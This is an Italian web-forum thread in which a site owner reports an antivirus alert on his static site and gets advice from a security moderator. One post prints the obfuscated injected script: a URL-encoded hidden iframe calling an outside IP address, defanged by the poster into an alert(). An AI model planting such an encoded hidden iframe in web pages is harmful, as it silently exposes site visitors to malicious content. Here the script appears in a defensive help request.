Visualizzazione dei risultati da 1 a 5 su 5

Discussione: Multi:Qtp-D

  1. #1
    Utente di HTML.it L'avatar di deleted_id_48586
    Registrato dal
    Nov 2002
    Messaggi
    1,732

    Multi:Qtp-D

    Ciao a tutti,

    ho appena riscontrato una certo Virus/Worm su un sito che gestisco nel tempo libero: http://www.lalocomotivaweb.it/

    Segnalato da AVAST: Multi:Qtp-D

    Se entrate con Firefox dovreste vedere un piccolo quadratino nero in home page che penso (dato che prima non c'era) possa in qualche modo essere in relazione.

    ATTENZIONE!
    Visualizzare solo con Firefox altrimenti con IE vi dovrebbe venire segnalato il virus.

    Come faccio ad eliminarlo dal mio spazio sul server?

    Esiste qualche tool specifico come si fa sul proprio PC di casa, o è meglio sentire il provider?

    Purtroppo su internet non trovo informazioni a riguardo.

    Grazie mille!

  2. #2
    Utente di HTML.it L'avatar di deleted_id_48586
    Registrato dal
    Nov 2002
    Messaggi
    1,732
    Forse l'ho beccato.

    Nella index avevo questo script:

    codice:
    <script language="javascript">
    alert( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%38%31%2E%32%39%2E%32%34%31%2E%32%33%36%2F%61%63%63%32%2F%61%6E%6E%61%2F%69%6E%64%65%78%2E%70%68%70%3F%69%64%3D%31%31%31%27%20%68%65%69%67%68%74%3D%27%31%35%27%20%77%69%64%74%68%3D%27%31%35%27%20%73%63%72%6F%6C%6C%69%6E%67%3D%27%6E%6F%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%6E%6F%27%3E%3C%2F%69%66%72%61%6D%65%3E' ) );
    </script>
    Potete eseguirlo tranquillamente visto che ho cambiato con un semplice alert() quello che prima veniva scritto nel codice della pagina con il metodo document.write().

    Pare richiami un IFRAME da un certo Server.

    Avete qualche info in merito?

  3. #3
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    come puoi vedere sei in buona compagnia...
    http://www.google.com/search?client=...utf-8&oe=utf-8

    si tratta di un sito russo.

    Il tuo sito mi sembra tutto html statico, sbaglio?

    In ogni caso contatterei il tuo provider sottoponendogli il problema. Forse riesce a darti delle indicazioni su come sia avvenuta l'iniezione di codice..
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  4. #4
    Utente di HTML.it L'avatar di deleted_id_48586
    Registrato dal
    Nov 2002
    Messaggi
    1,732
    Ti ringrazio!

    Si, il sito è statico anche se fra poco passo ad una nuova versione dinamica.

  5. #5
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    Se il sito è completamente statico è molto probabile che abbiano sfruttato una vulnerabilità di configurazione del server. Questo significa che la responsabilità è del tuo hoster, non del tuo sito.

    Il tuo hoster (che non nomino volutamente), assieme ad un altro hoster molto conosciuto, sono da tempo sotto questo tipo di attacco. Tantissimi utenti sono stati vittima come te di questo genere di iniezione di codice.

    Il mio consiglio è quello di contattarli e far loro pressioni perchè verifichino e risolvano al più presto il problema. Nel frattempo tieni monitorata la situazione.
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.